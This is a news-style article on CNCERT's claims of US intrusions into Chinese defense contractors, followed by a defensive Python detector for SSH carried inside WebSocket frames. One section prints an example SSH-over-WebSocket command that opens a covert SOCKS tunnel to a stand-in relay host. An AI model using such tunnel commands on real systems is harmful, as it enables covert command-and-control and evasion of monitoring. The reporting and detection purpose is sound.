CNCERT Accuses US Intelligence Agencies of Attacking Chinese Military-Industrial Units

Since mid-2022, Chinese military-industrial networks have reportedly been the target of highly sophisticated cyber intrusions attributed to US intelligence agencies.

These campaigns exploited previously unknown vulnerabilities to install stealthy malware, maintain prolonged access, and exfiltrate sensitive defense data.

Initially identified following an NSA breach at Northwestern Polytechnical University, the latest incidents uncovered by CNCERT illustrate a relentless focus on China’s defense manufacturing and research establishments.

Emerging in July 2022, the primary malware family exploited a zero-day flaw in Microsoft Exchange servers. Attackers breached an email system within a major military contractor and established persistence for nearly a year.

By leveraging an internal domain controller as a springboard, the intrusion team performed lateral movement to compromise over fifty core hosts.

CNCERT analysts noted that the operators deployed obfuscated payloads, tunneled via WebSocket-wrapped SSH sessions, and routed traffic through relay nodes in Germany and Finland to evade network monitoring.

In a second wave between July and November 2024, adversaries targeted an electronic file system vulnerability across over 300 devices in a supplier’s production environment.

Through compromised Romanian and Dutch IP addresses, they manipulated Tomcat service filters to implant Trojanized upgrade packages.

These bespoke Trojans executed keyword searches for “secret work” and “core network,” harvesting proprietary architectural diagrams and protocol specifications.

CNCERT researchers identified this campaign’s hallmark stealth techniques, including dynamic log wiping and active reconnaissance of defense-specific intrusion detection systems.

Following these disclosures, recent talks between the Cyberspace Administration of China and Nvidia underscored the critical importance of supply-chain security.

Authorities emphasized the risks of reliance on foreign-sourced hardware and software components that may carry pre-installed backdoors.

Covert Channel and Persistence Tactics

One defining characteristic of the Exchange-based intrusions is the custom WebSocket over SSH covert channel. After initial foothold, operators executed a user-space SSH daemon disguised as a messaging service.

The daemon listens on port 80 for WebSocket handshake requests. Once established, encrypted payloads traverse this tunnel, enabling bidirectional command and control without triggering typical SSH or HTTPS alerts. A simplified example of the tunnel setup on the compromised host might resemble:

ssh -o ProxyCommand="websocat ws-connect://relay.example.net:443" \
    -N -D localhost:1080 -i /path/to/obf_key.pem

This command spins up a SOCKS proxy on the compromised host, funneling all traffic through a remote relay. By obfuscating SSH within standard WebSocket frames, the attackers maintained covert, long-term access to mission-critical networks without detection.
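As an added, detection-oriented example (not from the CNCERT report or this article), the Python below inspects a captured client-side byte stream for an HTTP WebSocket upgrade whose first data frame begins with an SSH identification string, which is the fingerprint a sensor on port 80 would look for given the WebSocket-wrapped SSH channel described above. The hostname, header values and sample traffic are constructed.

```python
import struct
from typing import Optional

# Constructed sample: what a network sensor sees from the client side of a disguised
# SSH session on port 80 (HTTP Upgrade handshake followed by one masked WebSocket frame).
HTTP_UPGRADE = (
    b"GET /chat HTTP/1.1\r\nHost: relay.example.net\r\n"
    b"Upgrade: websocket\r\nConnection: Upgrade\r\n"
    b"Sec-WebSocket-Key: dGhlIHNhbXBsZSBub25jZQ==\r\nSec-WebSocket-Version: 13\r\n\r\n"
)

def mask_frame(payload: bytes, key: bytes = b"\x12\x34\x56\x78") -> bytes:
    """Build a masked binary WebSocket frame; used only to construct the sample traffic."""
    assert len(payload) < 126  # constructed sample stays in the 7-bit length form
    masked = bytes(b ^ key[i % 4] for i, b in enumerate(payload))
    return bytes([0x82, 0x80 | len(payload)]) + key + masked

def parse_frame(data: bytes) -> bytes:
    """Decode the first WebSocket frame in data (RFC 6455 framing) and return its payload."""
    if len(data) < 2:
        raise ValueError("truncated frame header")
    masked = bool(data[1] & 0x80)
    length, offset = data[1] & 0x7F, 2
    if length == 126:
        length, offset = struct.unpack("!H", data[2:4])[0], 4
    elif length == 127:
        length, offset = struct.unpack("!Q", data[2:10])[0], 10
    key = b"\x00" * 4
    if masked:  # clients must mask; servers must not
        key, offset = data[offset:offset + 4], offset + 4
    payload = data[offset:offset + length]
    if len(payload) < length:
        raise ValueError("truncated payload")
    return bytes(b ^ key[i % 4] for i, b in enumerate(payload)) if masked else payload

def ssh_banner_in_websocket(stream: bytes) -> Optional[bytes]:
    """Return the SSH identification string when the stream is an HTTP WebSocket upgrade
    whose first data frame carries an SSH banner (RFC 4253 'SSH-2.0-...'); otherwise None."""
    head, sep, rest = stream.partition(b"\r\n\r\n")
    if not sep:
        return None
    headers = {k.strip().lower(): v.strip().lower()
               for k, _, v in (line.partition(b":") for line in head.split(b"\r\n")[1:])}
    if headers.get(b"upgrade") != b"websocket":
        return None  # plain HTTP, not an upgraded channel
    try:
        payload = parse_frame(rest)
    except ValueError:
        return None
    return payload.split(b"\r\n", 1)[0] if payload.startswith(b"SSH-") else None

SAMPLE = HTTP_UPGRADE + mask_frame(b"SSH-2.0-OpenSSH_9.6\r\n")
```

The same check applied to the server-to-client direction (unmasked frames) catches the server's banner, so the heuristic works regardless of which side a sensor captures.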
